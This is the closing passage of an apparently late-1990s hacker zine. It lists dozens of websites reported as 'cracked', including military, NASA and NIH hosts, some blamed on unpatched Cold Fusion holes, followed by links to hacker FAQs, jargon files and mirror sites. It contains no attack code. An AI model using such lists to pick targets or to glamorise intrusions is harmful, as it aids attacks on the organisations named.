asi.bigsky.net
www.emmsa.com (cold fusion)
eforms.sjdccd.cc.ca.us
www.energy.wsu.edu (cold fusion)
May 4th
From HNN rumours section http://www.hackernews.com/
contributed by Anonymous
Cracked
People still have not fixed their Cold Fusion holes. There are a smattering of .mil sites today as
well. Wonder how many commanders learn about thier security breaches from HNN?
http://www.pentagon.co.yu
http://www.italsrem.co.yu
http://www.martinart.co.yu
http://www.carbo.co.yu
http://www.net022.co.yu
http://force21.c3sys.army.mil
http://www.ett.redstone.army.mil
http://bliss-usasma.army.mil
http://call.army.mil
http://www.wwd.net
http://www.wrestlemaniacs.com
http://www.centrestate.com
http://www.herb.be
http://www.pwr1.com
http://www.shenandoah.com
http://www.suite101.com
http://www.galaxy-web.com
http://www.1688.com
http://jacwm.nac.net
http://www.rotorcraft.com
http://www.ulead.com.tw
http://www.glynn.com
http://www.gecc.com
http://www.zol.ch
http://www.news400.com
May 6th
From HNN rumours section;
contributed by Anonymous
Cracked
Many of these government sites where reported as
cracked by the group known as Foxpare.
http://comms2.rdc.uscg.mil
http://c4iweb.nosc.mil/
http://bigblue.od.nih.gov
http://www.freedom.edu
http://www.mrihsv.com
http://www.queen.it
http://eo1.gsfc.nasa.gov
http://comms2.rdc.uscg.mil
-------------------------------------------------------------------------
A.0 APPENDICES
_________________________________________________________________________
A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The links are no longer maintained in this file, there is now a
links section on the http://welcome.to/HWA.hax0r.news/ url so check
there for current links etc.
The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
<a href="http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html">hack-faq</a>
Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html
<a href="http://www.lysator.liu.se/hackdict/split2/main_index.html">Original jargon file</a>
New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/
<a href="http://www.tuxedo.org/~esr/jargon/">New jargon file</a>
Mirror sites:
~~~~~~~~~~~~
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.genocide2600.com/~tattooman/zines/hwahaxornews/
http://archives.projectgamma.com/zines/hwa/.
International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~
Foreign correspondants and others please send in news site links that
have security news from foreign countries for inclusion in this list
thanks... - Ed
Belgium.......: http://bewoner.dma.be/cum/ <a href="http://bewoner.dma.be/cum/">Go there</a>
Brasil........: http://www.psynet.net/ka0z <a href="http://www.psynet.net/ka0z/">Go there</a>
http://www.elementais.cjb.net <a href="http://www.elementais.cjb.net/">Go there</a>
Columbia......: http://www.cascabel.8m.com <a href="http://www.cascabel.8m.com/">Go there</a>
http://www.intrusos.cjb.net <a href="http://www.intrusos.cjb.net">Go there</a>
Indonesia.....: http://www.k-elektronik.org/index2.html <a href="http://www.k-elektronik.org/index2.html">Go there</a>
http://members.xoom.com/neblonica/ <a href="http://members.xoom.com/neblonica/">Go there</a>
http://hackerlink.or.id/ <a href="http://hackerlink.or.id/">Go there</a>
Netherlands...: http://security.pine.nl/ <a href="http://security.pine.nl/">Go there</a>
Russia........: http://www.tsu.ru/~eugene/ <a href="http://www.tsu.ru/~eugene/">Go there</a>
Singapore.....: http://www.icepoint.com <a href="http://www.icepoint.com">Go there</a>
Got a link for this section? email it to hwa@press.usmc.net and i'll
review it and post it here if it merits it.
@HWA
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
� 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]